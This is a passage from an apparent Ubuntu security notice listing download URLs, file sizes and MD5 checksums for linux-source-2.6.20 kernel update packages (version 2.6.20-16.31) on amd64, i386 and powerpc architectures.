http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:  1110522 41b51553dde0a4c1fe3a6cba67a943ac
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:  1754820 0b67f1cc816f96777c4035f4536dc34d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   140922 68de52e127bbeabceda23d61a36322f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   163320 ad8f39c56c00d85cb69e0d14cd7510d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   265728 f9bf51de08b4b70546e7bb412dedfe5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    34298 bd875a9e3a6204b2e2c81851e763c501
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    38438 126954fc2b53b6371332715fcf97b8fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    67682 82587156ac6bbf9b24485f3e47ba73e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    20962 40eadc3c9036b2e47dddc43561eae9d8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:     8328 45da242f89022fb095499adf1ad4229f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    54580 1de7964374ceaa29e42b1ee4c46722b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    86016 301d95060d03db0efbd6a13b087c46dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   322570 ac8b968393ae953b9df98134ae117861
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:  1046886 84c9ea8c539c15bdaff8ca8f37cbdf7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    43976 0ddc45fffff5249b5551b2e673b73b15
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    12012 ccb1f0c0fbc1074e1b1ccbee31630597
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    61918 982e8d147d6b54edb3a8f83adc3c6086
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   377828 cad9af34b502d072b7922f700d077f47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    66666 628ae089db689328b0a41682bf0e5900
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.31_amd64.deb
  Size/MD5: 23125936 b1a8c95965a2ef280b13a422a4d6173c
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.31_amd64.deb
  Size/MD5: 18477150 34a36604a92f81d1560457bd113330b1

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    20322 e8ab9fd789fe1b8f0c8546c00e763e25
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    22888 8d0d299344fde6654991003cbac384f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   210074 efa1c3d6a93ccb7296d67b1d0f937681
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   212252 d48b3db497527154d378b6f9bfd0edd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    88698 e85fbe5bf7d9909d7bc00ce6f7305959
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    35626 cde513a471134d3560aac41fbd6d70cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    37740 fac42d0beab2e5f68baf2e19d76a2778
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    38416 12a300b67959db63206e8122d560489b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    45640 6faf39407cd6c881666e16309202e62d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    45804 5214d5c0756417da98784c85e4ede304
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   179468 53d4e47e8ffe950ccd146666101b7157
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   179830 49c07cb759ae3708ca26e09b15a943b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    32104 e574d74194c75cc699920672b137400a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    32426 3e84e290381c1cf7c2c7c0f7a5a74a6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   648648 416f1cde45a2ecd76de54875150a7879
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   667458 00ea27a9d01f200cb65926ed9d6a9cd6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   178212 a93bea57ce7779cbc4dcce35a5487a64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   181284 2ea1dce0a2d6b197c00946d9a44c3834
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    72392 59330a18dd5e401e938781ef311f31f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    74054 41220f95474992bbd26223aac196f4a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    53578 9a7390218ace76fa1f00e243502c3e81
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    54790 648d4b48dbef21bb4cdb57bd6177947d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   129184 f9e56d8470f376595383fbc54c3d4310
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   134878 ebb36b1cf716fa2f7ef59d2f197b95cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   275956 294313e8e94b96b3b800f2b0830bcd89
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   274972 6f05cd6698404431694da60df75d5a7d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:  1815218 7ae643f0eb6d41d7570b5b05d4922959
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:  1886534 e8e1809266b9d6e3179fe8208e73e750
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.31_i386.deb
  Size/MD5:   844272 66490409aa7465bb64db19ca4e37bac1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.31_i386.deb
  Size/MD5:   849482 eed7f1e2febb4e8b6a1c09ecbbe4251d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.31_i386.deb
  Size/MD5:   841878 a8c7b5f67015adbf13449a768812df54
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.31_i386.deb
  Size/MD5:   850348 bc6d77642ca93c95875eeb929cb35d12
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.31_i386.deb
  Size/MD5:   847286 f5889a4a92ff20c893742a98f366c7f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_i386.deb
  Size/MD5:  8118254 7ae93d26293ec4b8d69995342bd0784d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.31_i386.deb
  Size/MD5: 23746716 53eb1ff56c3673abb4999657cd1289aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.31_i386.deb
  Size/MD5: 23812992 1b0cda5d74a37df374841374ca82cddb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.31_i386.deb
  Size/MD5: 24376420 7059f5cbf8ffc55cb16b62d0fa1d8e79
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.31_i386.deb
  Size/MD5: 23866754 435d7d5fbb668bb962a681ebafd0d0af
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.31_i386.deb
  Size/MD5: 23587990 69734d888bdbe1417f6c88b03f5e4ff8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.31_i386.deb
  Size/MD5: 24165892 e9f0dd3a1cbed9f4c275bc35d31427fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.31_i386.deb
  Size/MD5: 25658356 5d4b95dbe14f67113a961a5a419d8ef8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.31_i386.deb
  Size/MD5: 24393594 720c451484e4e17ecfdfbb0036aa6506
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_i386.deb
  Size/MD5:   667938 2b7ff6cd306c617c326433b931e216f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   244602 e913dcb61ef84b6627b7f18237a712d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   250124 7f2228c4ab74af27fba4bb22462263ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   132546 40311392b60143adc9fe23f3dd38cfb7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   133078 ca3ce80ba0b75545dc34638b5e3e3093
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   213188 4e288fe10dcec0c1392ceba87aefa0b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   220604 293c95c215960ad9c8179b1b87badb2a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:  1110410 75deb32ca249568e08b0c5b2ed5cabf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:  1110518 ce208c014af3ccfd3be5a22140bf3409
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:  1951376 e21d5a4cfae2c7abd52ce321a31da6e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:  1974734 db0e2ba53b60a7f75f7dab6846d1b84e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   149860 a4f1351290e30f1c4e7260eda9f88848
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   142502 6f7279214ccebd2ebae2e3e07c0366cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   160736 2a5196a2451a69a95ac4081ee383d047
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   161936 2ee85739f55c9c48454ecff39fa5cc2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   252950 e6d25fb7085fa024c8215794bf41cf7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   255524 ad476aca2e64994e4996e174f0129d01
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    32766 355e4201f652623ba7a425a455ddd591
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    33336 84393db083655e4746ee5f8872d1634c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    38030 3cd77914f9e2a14b45bffdbcb7afd379
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    38304 312bae8ca1298fb78eeb5f2c14024b1b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    81860 01a489568d19811b95dbda49807e554c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    82094 916c336e60e8e5a6c3ded678daf3eb67
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    47686 a554ef6d1fc404b299b2ca9eab600052
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    47720 e4bd92d0011d9968e3b11a2b53ad898d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:     8262 215b2b44f65782e91f246c9892c36d9b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:     8496 8325dd4d7645b52215c584ee313090c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    49958 b7fdb76f7e7b9b53bdfb61d5b4cbaf02
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    51874 b4cd612bd943018b048d33fc01e5b86b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    78852 6017590ac379305f3582cb580c53d69c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    79498 d54d0bf75b57827e777227bf42aa6696
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   322544 83fb94754d28fef49f55abe43d7210d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   322558 3f453982483722a158b076654a2cbf13
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:  1362526 a4592f0dd429f6e30cc099f576875724
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:  1347968 e1eff7dc50dda5e62f0048d5b79c9cb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    42454 b9ed0551f44707a796103007e701ea7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    42232 3bf62f9da0492ea4b89c5e97e2331d6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    10764 e4256b9c2b4c127c58a9767480e54fae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    11400 379056a56e93d6f937eed48d688a8b1f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    55990 4f518d325713f1236e4b0a25f8dd7b52
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    56906 4b4737720e477381e0fb36dd4144bfbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:   360292 771d1ef6457a09df95544efd1e60eb06
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:   363244 35c8893c56a7d607a710053281fbbf91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb
  Size/MD5:    63174 3b76dd2a0add8ca514ad29439f68eecb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb
  Size/MD5:    63822 c53f0bbf1e69c2640ac21d28686511fd
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.31_i386.deb
  Size/MD5: 23844340 0983e69e816ab28b4b64e334402783e8
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.31_i386.deb
  Size/MD5: 24183898 e8003d1d07e9a8c1406a4015b69c6c3b

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   328852 a7cd45e2be9e7e24b69bddedd50bfdb4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   325564 1ef1df8e755a7a5b77b8581619c89ee0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    41192 1cac100551f5e4b6b0e2ae199611864b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    47458 9b33803ceac1d9870c77519d76a04ca2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   219676 9b9cd2b6baf413bdca155456830c6f17
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   239174 5f1653e0836212e88ba2311f02f87620
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    43658 bcfd2536cffc99bea761590c172ff275
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    39788 24d008470a22eec523ccdae1a2deefa6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   717810 bfd614b17ec4871312b6d3ac5a9a5bc6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   776474 8f19375582c1eaf502b12eecb6654ab1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   205086 15c27cf635e6df1a0a3002244c6df7b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   209732 41f77baa8bd624a3e308020161ef65a6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    59220 8edd5472ed0b49960ef60d5a08938662
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    66868 c9eab04b79d1d69cb0413a2baa82b032
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    64208 dc65a0af2c574e8be115966b8546a8b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    65334 645b7161988b7d45de3909ec5495f9f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   144020 d3bd7f70c349f7c3f418e1874e1fd3b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   162728 9e4d6c1014ee67ac7936ae633e5b8c40
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   383368 0e4c1db36a8fb12a4ed0ad6f1812cd51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   251816 60e37f8e82d11c812da0a5fc13956ff0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:  2157386 9f989874c520ef7162ff584b1b46c57c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:  3083276 9593e34c7bdd87099e52fc6c9b895cab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.31_powerpc.deb
  Size/MD5:   862972 b92ce0da33fa2ec26026fc0953fb08e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.31_powerpc.deb
  Size/MD5:   871242 3c5ab3bbae356d7f871ce32467dc5be3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.31_powerpc.deb
  Size/MD5:   861158 1b4608e402fe83c9fc98c61901e78d66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_powerpc.deb
  Size/MD5:  8149744 6da619f7644f352241474fe8c477fb74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.31_powerpc.deb
  Size/MD5: 24515980 660232361f3989d0410feb6a6db7b0d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.31_powerpc.deb
  Size/MD5: 26857602 9264e9266e6cb960f827f92d36f40548
